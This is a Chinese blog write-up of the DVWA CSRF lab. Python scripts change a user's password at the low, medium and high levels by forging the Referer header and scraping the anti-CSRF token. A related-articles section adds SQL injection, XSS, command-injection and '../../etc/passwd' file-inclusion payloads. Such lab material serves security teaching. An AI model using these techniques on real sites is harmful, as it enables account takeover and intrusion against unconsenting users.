DVWA - CSRF (low, medium, high)

最新推荐文章于 2024-10-31 13:28:40 发布
原创 最新推荐文章于 2024-10-31 13:28:40 发布 · 3.7k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#security

本文通过实例演示了如何针对不同安全级别的CSRF漏洞进行攻击,包括设置PHPSESSID和security参数进行基本攻击、通过Referer验证提高攻击难度及动态获取user_token实现高级攻击。
该文章已生成可运行项目,

low

设置一下cookie的PHPSESSID和security即可跨站请求

import requests

def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
    headers = {
        'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=low',
    }
    new_password = 'ac'
    url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)
    res = requests.get(url, headers=headers)
    if 'Password Changed.' in res.content:
        print('Yes')
    else:
        print('No')


if __name__ == '__main__':
    main()

medium

查看源码,发现

// Checks to see where the request came from 
if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )

根据Referer验证请求来源,绕过思路:在HTTP请求头声明Referer。

import requests


def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
    headers = {
        'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=medium',
        'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'
    }
    new_password = 'ac'
    url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)
    res = requests.get(url, headers=headers)
    if 'Password Changed.' in res.content:
        print('Yes')
    else:
        print('No')


if __name__ == '__main__':
    main()

high

查看源码,发现多了动态user_token验证

// Check Anti-CSRF token 
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

绕过思路:在代码层面发跨站请求动态获取user_token,再发跨站请求修改密码。

import requests
import re


def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
    headers = {
        'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=high',
        'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'       
    }
    res = requests.get(url, headers=headers)
    m = re.search(r"user_token' value='(.*?)'", res.content, re.M | re.S)
    if m:
        user_token = m.group(1)
        new_password = 'ac'
        url = '%s?password_new=%s&password_conf=%s&user_token=%s&Change=Change' % (url, new_password, new_password, user_token)
        res = requests.get(url, headers=headers)
        if 'Password Changed.' in res.content:
            print('Yes')
        else:
            print('No')
            print(res.content)


if __name__ == '__main__':
    main()

注:这3个实验要跨站,别一直都在本地同一个浏览器测试,这没意思。

本文章已经生成可运行项目
DVWA-CSRF
STTTM的博客
12-18 1188
LOW等级: 首先进行正常操作。 接下来打开burpsuit抓包 如图所示,将password参数test改为password: 退出DVWA用刚刚修改的密码成功登陆: 由此可知,这个数据包发送给其他用户,只要该用户登陆了DVWA的网站,就能修改他们的密码,攻击者只要修改password_new和password_conf这两个参数为自己想要的密码,将新的get请求的...
dvwacsrf
qq_17762247的博客
05-15 482
一、简介 CSRF是指在受害人不知情的情况下,以其身份向服务器发送服务器发送请求,从而执行非法操作(转账,改密等)。以转账为例,受害人A使用浏览器登录某银行网站B完成查看余额操作后,在未退出的情况下访问了攻击网站C,C利用浏览器中的Session伪造转账请求发送给B,由于B发现该转账请求包含用户登录信息,转账成功。Cross-site是指受害者在访问网站C时给网站B发送了请求,request forgery是指该请求是网站C伪造的,并不是A的本意。 二、Low 1、服务器端代码 <?php if(
DVWA CSRFmedium级别
qq_59119347的博客
10-31 239
上述代码的意思是说去Referer字段里面查找是否存在ServerName(即主机IP或域名)字段的值,如果存在则满足条件。为了构造一个有效的Referer,可以创建一个新的HTML页面,命名为:网站的IP.html。当我们点击1这个链接时网站就会跳转到这么修改密码的界面,并把密码修改完成。referer字段就包含了这网站的地址就实现的绕过。并在本地创建一个名字为自己IP的html界面。我们在这么html里面写入攻击脚本。我们在kali里面启一个临时网站。我们点击这么html链接。
DVWACSRF
GVFDBDF的专栏
09-05 1178
1、源码审计(low级别)                      if (isset($_GET['Change'])) {              // Turn requests into variables         $pass_new = $_GET['password_new'];         $pass_conf = $_GET['passwor
DVWACSRF
RexHa的博客
09-30 9072
CSRF,跨站域请求伪造,通常攻击者会伪造一个场景(例如一条链接),来诱使用户点击,用户一旦点击,黑客的攻击目的也就达到了,他可以盗用你的身份,以你的名义发送恶意请求。
DVWA-csrf
告白的博客
07-28 640
0x00 漏洞介绍 CSRF全称为跨站请求伪造(Cross-site request forgery),是一种网络攻击方式,也被称为 one-click attack 或者 session riding。 CSRF攻击利用网站对于用户网页浏览器的信任,挟持用户当前已登陆的Web应用程序,去执行并非用户本意的操作。 用户登录、浏览并信任正规网站WebA,同时,WebA通过用户的验证并在用户的浏览器中产生Cookie。 简单理解:将即将支付网址连接盗取,将伪造站点操作代码放在csrf伪造站点,当点击伪造站点自动
DVWA-CSRF(跨站请求伪造)
qq_45751902的博客
04-25 3161
目录CSRF(跨站请求伪造)简介安全级别:Low安全级别:Medium安全级别:High安全级别:Impossible CSRF(跨站请求伪造)简介 概念 CSRF(Cross—site request forgery),跨站请求伪造,是指利用受害者未失效的身份认证信息(cookie,会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下,以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账,改密等)。 CSRF与XSS的区别 CSRF属于业务逻辑漏洞
DVWACSRF-Medium跨站请求伪造中级
qq_39330735的博客
02-09 1002
DVWACSRF-Medium跨站请求伪造中级,过关思路和详解
DVWA-CSRF跨站请求伪造 MediumLow级别
xmj818719的博客
02-27 422
1代码分析 过滤条件 if( stripos( $SERVER[ 'HTTP_REFERER' ] ,$SERVER[ 'SERVER_NAME' ]) !== false ) 判断,$SERVER[ 'SERVER_NAME' ]在 $SERVER[ 'HTTP_REFERER' ] 中是否存在,寻找第一次出现的地址 $_SERVER[ ' SERVER_NAME' ] 网站的地址 192.168.0.9 $_SERVER[ 'HTTP_REFERER' ] 请求发起着地址 192.1.
DVWA-CSRF全级别教程
weixin_44716769的博客
09-08 3963
CSRF Low等级 查看源码 服务器收到修改密码的请求后,会检查参数password_new与password_conf是否相同,如果相同,就会修改密码,并没有任何的防CSRF机制(当然服务器对请求的发送者是做了身份验证的,是检查的cookie,只是这里的代码没有体现)。 构造链接 http://192.168.0.103/vulnerabilities/csrf/?password_new=zuowenyang&password_conf=zuowenyang&Change=Chang
DVWA-CSRF漏洞
sc_Pease的博客
01-29 564
参考:https://blog.youkuaiyun.com/qq_44720671/article/details/97393100 一、漏洞简介 1,CSRF:cross-site request forgery跨站请求伪造,一种常见Web攻击。 2,利用场景:攻击者伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击就完成了。 3,与XSS比较:csrf是借助用户的权限去完成,而xss是盗取用户权限去进行破坏。 二、查看不同难度的dvwa源代码 1,low难度 查看网页源代码
dvwa csrf
一个安全研究员
05-17 786
科普 csrf就是江湖中的借刀杀人,这里的刀就是用户的cookie,例如:当一个用户登陆了某个系统时,该用户就持有了这个系统分发给他的会话,然后csrf这个漏洞就是我们可以利用这个会话来伪造请求。具体的利用方法,我将通过dvwa中的实例来讲解。 low 虽然我们的dvwa中比起真实的环境差了太多,但是我们可以假设我们现在处于一个真实的环境中,我们打开csrf页面,可以看到是一个改密的页面: ...
dvwa-csrf
Alter__的博客
04-23 510
(元素可提供有关页面的元信息,比如针对搜索引擎和更新频度的描述和关键词) (关联css文件) (role充当什么角色nav?)
dvwaCSRF
Alsn86的博客
02-05 473
dvwaCSRF 是一个修改密码的功能 把密码修改为111111的请求数据包是这样的,请求链接为http://192.168.1.110/dvwa-master/vulnerabilities/csrf/?password_new=111111&password_conf=111111&Change=Change CSRFlow等级 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_G
DVWA CSRF
m0_73606240的博客
01-13 320
DVWA CSRF
Dvwa系列之csrf
lowerxiaoshen的博客
12-09 1534
CSRF(Cross-site request forgery)CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)CSRF与XSS最大的
DVWA——CSRF
weixin_51559599的博客
11-13 2456
这样解决了上种方法在请求中加入 token 的不便,同时,通过 XMLHttpRequest 请求的地址不会被记录到浏览器的地址栏,也不用担心 token 会透过 Referer 泄露到其他网站中去。可以在 HTTP 请求中以参数的形式加入一个随机产生的 token,并在服务器端建立一个拦截器来验证这个 token,如果请求中没有 token 或者 token 内容不正确,则认为可能是 CSRF 攻击而拒绝该请求。可以利用这一点漏洞,可以想办法在恶意网站的地址中添加带有 Web1 主机地址的字段。
dvwa-http
最新发布
07-01
### DVWA HTTP Vulnerabilities Testing Guide DVWA (Damn Vulnerable Web Application) 是一个故意设计为存在漏洞的Web应用,主要用于教育和测试目的。它可以帮助安全研究人员、渗透测试人员和开发人员了解常见的Web应用程序漏洞及其利用方式。 #### 1. **HTTP方法与请求类型** 在进行DVWA漏洞测试时,理解HTTP方法(如GET、POST)是基础。DVWA中大多数漏洞都通过这些方法触发,尤其是在SQL注入、XSS和命令注入等场景中。 - GET请求通常用于从服务器获取数据,参数直接暴露在URL中。 - POST请求则常用于提交敏感信息,参数隐藏在请求体中。 ```python import requests # 示例:使用Python发送GET请求 response = requests.get('http://dvwa.local/login.php', params={'username': 'admin', 'password': 'password'}) print(response.text) # 示例:使用Python发送POST请求 data = {'username': 'admin', 'password': 'password'} response = requests.post('http://dvwa.local/login.php', data=data) print(response.text) ``` #### 2. **常见漏洞测试指南** ##### **SQL注入 (SQL Injection)** DVWA提供了不同安全级别的SQL注入漏洞,允许测试者尝试不同的注入技巧。例如,可以通过`UNION SELECT`来猜测字段数量并提取数据库信息 [^4]。 ```sql -- 示例:尝试登录绕过 ' OR '1'='1 -- 示例:使用UNION查询获取数据库版本 1' UNION SELECT NULL, version() # ``` ##### **跨站脚本攻击 (XSS)** DVWA支持反射型和存储型XSS漏洞的测试。攻击者可以插入恶意脚本以窃取会话cookie或执行其他恶意操作。 ```html <!-- 反射型XSS示例 --> <script>alert('XSS')</script> <!-- 存储型XSS示例 --> <img src="x" onerror="alert('Stored XSS')"> ``` ##### **命令注入 (Command Injection)** DVWA中的命令注入漏洞允许攻击者通过输入执行任意系统命令。此漏洞通常出现在未正确过滤用户输入的情况下。 ```bash # 示例:执行系统命令 127.0.0.1; ls -la ``` ##### **文件包含 (File Inclusion)** 本地文件包含(LFI)和远程文件包含(RFI)漏洞可以在DVWA中找到。这些漏洞可能导致服务器上的任意文件被读取或执行。 ```php // 示例:利用LFI读取配置文件 ?page=../../etc/passwd ``` ##### **CSRF (Cross-Site Request Forgery)** DVWA也包含了CSRF漏洞,攻击者可以诱导用户在不知情的情况下执行非预期的操作,比如更改密码或发送数据。 ```html <!-- 示例:CSRF攻击表单 --> <form action="http://dvwa.local/change_password.php" method="POST"> <input type="hidden" name="password_new" value="hacked" /> <input type="hidden" name="password_conf" value="hacked" /> <input type="submit" value="Click Me" /> </form> ``` #### 3. **安全级别设置** DVWA提供多种安全级别(Low, Medium, High, Impossible),每种级别对漏洞的防护程度不同。建议依次测试每个级别以理解不同防护机制的效果。 - **Low**:几乎没有任何保护措施。 - **Medium**:增加了基本的过滤规则。 - **High**:采用更严格的过滤策略,但仍可能存在绕过方法。 - **Impossible**:理论上无法被攻破,适合学习最佳实践。 #### 4. **防御建议** 针对DVWA中出现的漏洞,开发者应采取以下措施加强安全性: - 对所有用户输入进行严格的验证和过滤。 - 使用预编译语句防止SQL注入。 - 对输出进行HTML实体编码以避免XSS。 - 避免动态执行用户提供的代码或命令。 - 实施CSRF令牌机制确保请求来源合法性。 ---
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值